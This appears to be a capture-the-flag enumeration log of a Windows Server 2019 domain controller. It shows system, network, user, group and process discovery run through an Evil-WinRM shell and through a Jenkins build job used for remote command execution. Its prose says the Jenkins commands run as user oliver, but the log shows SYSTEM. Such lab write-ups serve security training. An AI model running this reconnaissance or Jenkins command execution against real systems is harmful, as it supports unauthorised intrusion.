System/Kernel
*Evil-WinRM* PS C:\Users\oliver\Documents> systeminfo ; Get-ComputerInfo
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1
+ systeminfo ; Get-ComputerInfo
+ ~~~~~~~~~~.
At line:1 char:1
+ systeminfo ; Get-ComputerInfo
+ ~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
WindowsBuildLabEx : 17763.1.amd64fre.rs5_release.180914-1434
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandard
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 4/10/2020 5:48:06 PM
WindowsProductId : 00429-00521-62775-AA439
WindowsProductName : Windows Server 2019 Standard
WindowsRegisteredOrganization :
WindowsRegisteredOwner : Windows User
WindowsSystemRoot : C:\Windows
WindowsVersion : 1809
OsServerLevel : FullServer
KeyboardLayout :
TimeZone : (UTC-08:00) Pacific Time (US & Canada)
LogonServer :
PowerPlatformRole : Desktop
DeviceGuardSmartStatus : Off
Windows Server 2019 Standard
17763.1.amd64fre.rs5_release.180914-1434
I get an Access is Denied error when executing systeminfo.exe. However, I get a different result when executing systeminfo.exe from the Jenkins build process below.
System/Kernel (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins16685956896460781573.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>systeminfo
Host Name: JENKINS
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA439
Original Install Date: 4/10/2020, 9:48:06 AM
System Boot Time: 9/20/2023, 1:54:07 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume3
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 6,143 MB
Available Physical Memory: 4,170 MB
Virtual Memory: Max Size: 7,167 MB
Virtual Memory: Available: 5,195 MB
Virtual Memory: In Use: 1,972 MB
Page File Location(s): C:\pagefile.sys
Domain: object.local
Logon Server: N/A
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB5004335
[02]: KB4535680
[03]: KB4539571
[04]: KB4570332
[05]: KB4589208
[06]: KB5005112
[07]: KB5005030
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.132
[02]: fe80::f00b:8831:17ef:6c30
[03]: dead:beef::f00b:8831:17ef:6c30
[04]: dead:beef::20c
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
I am able to execute systeminfo.exe as the oliver user through the Jenkins build process.
This difference in behaviour comes from the security context Jenkins runs in: commands launched from a build job execute in the Jenkins process's context rather than in the restricted WinRM session, so the same binary that is denied over Evil-WinRM runs from the job.
Microsoft Windows Server 2019 Standard
10.0.17763 N/A Build 17763
x64-based
7 Hotfix(s)
Networks
*Evil-WinRM* PS C:\Users\oliver\Documents> ipconfig /all ; arp -a
Windows IP Configuration
Host Name . . . . . . . . . . . . : jenkins
Primary Dns Suffix . . . . . . . : object.local
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : object.local
htb
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-8B-01
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::20c(Preferred)
Lease Obtained. . . . . . . . . . : Wednesday, September 20, 2023 1:54:28 AM
Lease Expires . . . . . . . . . . : Wednesday, September 20, 2023 6:24:27 AM
IPv6 Address. . . . . . . . . . . : dead:beef::f00b:8831:17ef:6c30(Preferred)
Link-local IPv6 Address . . . . . : fe80::f00b:8831:17ef:6c30%12(Preferred)
IPv4 Address. . . . . . . . . . . : 10.10.11.132(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
10.10.10.2
DHCPv6 IAID . . . . . . . . . . . : 100683862
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2C-9C-6B-96-00-50-56-B9-8B-01
DNS Servers . . . . . . . . . . . : ::1
127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Connection-specific DNS Suffix Search List :
htb
Interface: 10.10.11.132 --- 0xc
Internet Address Physical Address Type
10.10.10.2 00-50-56-b9-d7-84 dynamic
10.10.11.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
*Evil-WinRM* PS C:\Users\oliver\Documents> netstat -ano | Select-String LIST
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 900
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 900
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 5380
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2720
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 480
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1148
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1564
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:49673 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:49674 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:49678 0.0.0.0:0 LISTENING 620
TCP 0.0.0.0:49694 0.0.0.0:0 LISTENING 3040
TCP 0.0.0.0:52575 0.0.0.0:0 LISTENING 2220
TCP 10.10.11.132:53 0.0.0.0:0 LISTENING 3040
TCP 10.10.11.132:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 3040
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:88 [::]:0 LISTENING 640
TCP [::]:135 [::]:0 LISTENING 900
TCP [::]:389 [::]:0 LISTENING 640
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:464 [::]:0 LISTENING 640
TCP [::]:593 [::]:0 LISTENING 900
TCP [::]:636 [::]:0 LISTENING 640
TCP [::]:3268 [::]:0 LISTENING 640
TCP [::]:3269 [::]:0 LISTENING 640
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:8080 [::]:0 LISTENING 5380
TCP [::]:9389 [::]:0 LISTENING 2720
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 480
TCP [::]:49665 [::]:0 LISTENING 1148
TCP [::]:49666 [::]:0 LISTENING 1564
TCP [::]:49667 [::]:0 LISTENING 640
TCP [::]:49673 [::]:0 LISTENING 640
TCP [::]:49674 [::]:0 LISTENING 640
TCP [::]:49678 [::]:0 LISTENING 620
TCP [::]:49694 [::]:0 LISTENING 3040
TCP [::]:52575 [::]:0 LISTENING 2220
TCP [::1]:53 [::]:0 LISTENING 3040
TCP [dead:beef::20c]:53 [::]:0 LISTENING 3040
TCP [dead:beef::f00b:8831:17ef:6c30]:53 [::]:0 LISTENING 3040
TCP [fe80::f00b:8831:17ef:6c30%12]:53 [::]:0 LISTENING 3040
object.local
dead:beef::20c
dead:beef::f00b:8831:17ef:6c30
0.0.0.0:88
0.0.0.0:135
0.0.0.0:389
0.0.0.0:445
0.0.0.0:464
0.0.0.0:593
0.0.0.0:636
0.0.0.0:3268
0.0.0.0:3269
0.0.0.0:9389
10.10.11.132:139
Networks (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins10944981864935138310.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>ipconfig /all && arp -a && netstat -ano
Windows IP Configuration
Host Name . . . . . . . . . . . . : jenkins
Primary Dns Suffix . . . . . . . : object.local
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : object.local
htb
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-8B-01
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::20c(Preferred)
Lease Obtained. . . . . . . . . . : Wednesday, September 20, 2023 1:54:28 AM
Lease Expires . . . . . . . . . . : Wednesday, September 20, 2023 6:24:27 AM
IPv6 Address. . . . . . . . . . . : dead:beef::f00b:8831:17ef:6c30(Preferred)
Link-local IPv6 Address . . . . . : fe80::f00b:8831:17ef:6c30%12(Preferred)
IPv4 Address. . . . . . . . . . . : 10.10.11.132(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
10.10.10.2
DHCPv6 IAID . . . . . . . . . . . : 100683862
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2C-9C-6B-96-00-50-56-B9-8B-01
DNS Servers . . . . . . . . . . . : ::1
127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Connection-specific DNS Suffix Search List :
htb
Interface: 10.10.11.132 --- 0xc
Internet Address Physical Address Type
10.10.10.2 00-50-56-b9-d7-84 dynamic
10.10.11.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 900
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 900
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 5380
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2720
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 480
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1148
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1564
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:49673 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:49674 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:49678 0.0.0.0:0 LISTENING 620
TCP 0.0.0.0:49694 0.0.0.0:0 LISTENING 3040
TCP 0.0.0.0:52575 0.0.0.0:0 LISTENING 2220
TCP 10.10.11.132:53 0.0.0.0:0 LISTENING 3040
TCP 10.10.11.132:139 0.0.0.0:0 LISTENING 4
TCP 10.10.11.132:5985 10.10.16.5:36192 TIME_WAIT 0
TCP 10.10.11.132:5985 10.10.16.5:36194 ESTABLISHED 4
TCP 10.10.11.132:5985 10.10.16.5:56672 TIME_WAIT 0
TCP 10.10.11.132:5985 10.10.16.5:56698 TIME_WAIT 0
TCP 10.10.11.132:5985 10.10.16.5:58162 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:34150 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:34156 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39744 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39752 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39762 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39778 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39790 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39798 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39808 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39824 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39834 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:39836 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:43052 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:43056 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53398 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53412 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53414 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53418 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53420 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53426 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53428 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53432 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53434 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53442 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53446 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53454 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53456 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53462 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53476 TIME_WAIT 0
TCP 10.10.11.132:8080 10.10.16.5:53480 TIME_WAIT 0
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 3040
TCP 127.0.0.1:52392 127.0.0.1:52393 ESTABLISHED 5380
TCP 127.0.0.1:52393 127.0.0.1:52392 ESTABLISHED 5380
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:88 [::]:0 LISTENING 640
TCP [::]:135 [::]:0 LISTENING 900
TCP [::]:389 [::]:0 LISTENING 640
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:464 [::]:0 LISTENING 640
TCP [::]:593 [::]:0 LISTENING 900
TCP [::]:636 [::]:0 LISTENING 640
TCP [::]:3268 [::]:0 LISTENING 640
TCP [::]:3269 [::]:0 LISTENING 640
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:8080 [::]:0 LISTENING 5380
TCP [::]:9389 [::]:0 LISTENING 2720
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 480
TCP [::]:49665 [::]:0 LISTENING 1148
TCP [::]:49666 [::]:0 LISTENING 1564
TCP [::]:49667 [::]:0 LISTENING 640
TCP [::]:49673 [::]:0 LISTENING 640
TCP [::]:49674 [::]:0 LISTENING 640
TCP [::]:49678 [::]:0 LISTENING 620
TCP [::]:49694 [::]:0 LISTENING 3040
TCP [::]:52575 [::]:0 LISTENING 2220
TCP [::1]:53 [::]:0 LISTENING 3040
TCP [::1]:389 [::1]:49676 ESTABLISHED 640
TCP [::1]:389 [::1]:49677 ESTABLISHED 640
TCP [::1]:389 [::1]:49692 ESTABLISHED 640
TCP [::1]:389 [::1]:49693 ESTABLISHED 640
TCP [::1]:389 [::1]:52401 ESTABLISHED 640
TCP [::1]:389 [::1]:52402 ESTABLISHED 640
TCP [::1]:389 [::1]:52403 ESTABLISHED 640
TCP [::1]:49676 [::1]:389 ESTABLISHED 3000
TCP [::1]:49677 [::1]:389 ESTABLISHED 3000
TCP [::1]:49692 [::1]:389 ESTABLISHED 3040
TCP [::1]:49693 [::1]:389 ESTABLISHED 3040
TCP [::1]:52401 [::1]:389 ESTABLISHED 2720
TCP [::1]:52402 [::1]:389 ESTABLISHED 2720
TCP [::1]:52403 [::1]:389 ESTABLISHED 2720
TCP [dead:beef::20c]:53 [::]:0 LISTENING 3040
TCP [dead:beef::f00b:8831:17ef:6c30]:53 [::]:0 LISTENING 3040
TCP [fe80::f00b:8831:17ef:6c30%12]:53 [::]:0 LISTENING 3040
TCP [fe80::f00b:8831:17ef:6c30%12]:389 [fe80::f00b:8831:17ef:6c30%12]:52568 ESTABLISHED 640
TCP [fe80::f00b:8831:17ef:6c30%12]:389 [fe80::f00b:8831:17ef:6c30%12]:52573 ESTABLISHED 640
TCP [fe80::f00b:8831:17ef:6c30%12]:9389 [fe80::f00b:8831:17ef:6c30%12]:49838 ESTABLISHED 2720
TCP [fe80::f00b:8831:17ef:6c30%12]:9389 [fe80::f00b:8831:17ef:6c30%12]:49839 ESTABLISHED 2720
TCP [fe80::f00b:8831:17ef:6c30%12]:49667 [fe80::f00b:8831:17ef:6c30%12]:52570 ESTABLISHED 640
TCP [fe80::f00b:8831:17ef:6c30%12]:49667 [fe80::f00b:8831:17ef:6c30%12]:53030 ESTABLISHED 640
TCP [fe80::f00b:8831:17ef:6c30%12]:49738 [fe80::f00b:8831:17ef:6c30%12]:135 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49744 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49747 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49750 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49753 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49759 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49762 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49765 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49768 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49772 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49775 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49779 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49782 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49785 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49788 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49791 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49794 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49797 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49800 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49803 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49806 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49809 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49812 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49815 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49818 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49822 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49825 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49828 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49831 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49834 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49837 [fe80::f00b:8831:17ef:6c30%12]:9389 TIME_WAIT 0
TCP [fe80::f00b:8831:17ef:6c30%12]:49838 [fe80::f00b:8831:17ef:6c30%12]:9389 ESTABLISHED 3076
TCP [fe80::f00b:8831:17ef:6c30%12]:49839 [fe80::f00b:8831:17ef:6c30%12]:9389 ESTABLISHED 3076
TCP [fe80::f00b:8831:17ef:6c30%12]:52568 [fe80::f00b:8831:17ef:6c30%12]:389 ESTABLISHED 2220
TCP [fe80::f00b:8831:17ef:6c30%12]:52570 [fe80::f00b:8831:17ef:6c30%12]:49667 ESTABLISHED 2220
TCP [fe80::f00b:8831:17ef:6c30%12]:52573 [fe80::f00b:8831:17ef:6c30%12]:389 ESTABLISHED 2220
TCP [fe80::f00b:8831:17ef:6c30%12]:53030 [fe80::f00b:8831:17ef:6c30%12]:49667 ESTABLISHED 640
UDP 0.0.0.0:123 *:* 328
UDP 0.0.0.0:389 *:* 640
UDP 0.0.0.0:5353 *:* 1068
UDP 0.0.0.0:5355 *:* 1068
UDP 0.0.0.0:57332 *:* 3040
UDP [dead:beef::20c]:53 *:* 3040
UDP [dead:beef::20c]:88 *:* 640
UDP [dead:beef::20c]:464 *:* 640
UDP [dead:beef::f00b:8831:17ef:6c30]:53 *:* 3040
UDP [dead:beef::f00b:8831:17ef:6c30]:88 *:* 640
UDP [dead:beef::f00b:8831:17ef:6c30]:464 *:* 640
UDP [fe80::f00b:8831:17ef:6c30%12]:53 *:* 3040
UDP [fe80::f00b:8831:17ef:6c30%12]:88 *:* 640
UDP [fe80::f00b:8831:17ef:6c30%12]:464 *:* 640
Users & Groups
*Evil-WinRM* PS C:\Users\oliver\Documents> net user ; dir C:\Users
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest krbtgt
maria oliver
The command completed with one or more errors.
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/10/2021 3:20 AM Administrator
d----- 10/26/2021 7:59 AM maria
d----- 10/26/2021 7:58 AM oliver
d-r--- 4/10/2020 10:49 AM Public
d----- 10/21/2021 3:44 AM smith
maria
smith
*Evil-WinRM* PS C:\Users\oliver\Documents> net localgroup ; net groups
Aliases for \\JENKINS
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.
Group Accounts for \\
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.
Users & Groups (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins11447908940462272705.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>net user && dir C:\Users
User accounts for \\JENKINS
-------------------------------------------------------------------------------
Administrator Guest krbtgt
maria oliver
The command completed successfully.
Volume in drive C has no label.
Volume Serial Number is 212C-60B7
Directory of C:\Users
10/22/2021 03:54 AM <DIR> .
10/22/2021 03:54 AM <DIR> ..
11/10/2021 04:20 AM <DIR> Administrator
10/26/2021 07:59 AM <DIR> maria
10/26/2021 07:58 AM <DIR> oliver
04/10/2020 10:49 AM <DIR> Public
10/21/2021 03:44 AM <DIR> smith
0 File(s) 0 bytes
7 Dir(s) 4,626,157,568 bytes free
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins12824676455424211834.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>net localgroup && net groups
Aliases for \\JENKINS
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.
Group Accounts for \\JENKINS
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed successfully.
Processes
*Evil-WinRM* PS C:\Users\oliver\Documents> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
78 5 3448 1964 492 0 cmd
78 5 2460 1452 2328 0 cmd
151 9 7896 6888 68 0 conhost
151 9 7388 6212 1356 0 conhost
150 9 6628 12472 0.05 5056 0 conhost
150 9 6648 12476 0.27 5436 0 conhost
502 20 2236 5440 372 0 csrss
279 16 2248 5172 488 1 csrss
362 15 3504 14912 4412 1 ctfmon
399 33 16604 23632 2220 0 dfsrs
157 9 2048 6144 3108 0 dfssvc
258 14 3904 13472 3708 0 dllhost
10384 7409 131500 129240 3040 0 dns
584 26 26216 55964 244 1 dwm
1400 54 20932 9320 5148 1 explorer
49 6 1508 4108 2696 0 fontdrvhost
49 6 1776 4836 2704 1 fontdrvhost
0 0 56 8 0 0 Idle
131 12 1972 5624 3000 0 ismserv
954 35 573424 540784 261.39 5380 0 java
259 15 18316 20928 5816 0 jenkins
459 25 18324 41692 3448 1 LogonUI
1842 165 75432 69028 640 0 lsass
479 36 54492 66336 2720 0 Microsoft.ActiveDirectory.WebServices
225 13 3104 10368 4008 0 msdtc
69 6 868 3248 3272 0 PING
69 5 828 3256 4332 0 PING
0 13 456 18800 88 0 Registry
276 14 3076 15372 5280 1 RuntimeBroker
147 8 1608 7780 5924 1 RuntimeBroker
339 19 10692 24472 6032 1 RuntimeBroker
676 33 20132 64536 5848 1 SearchUI
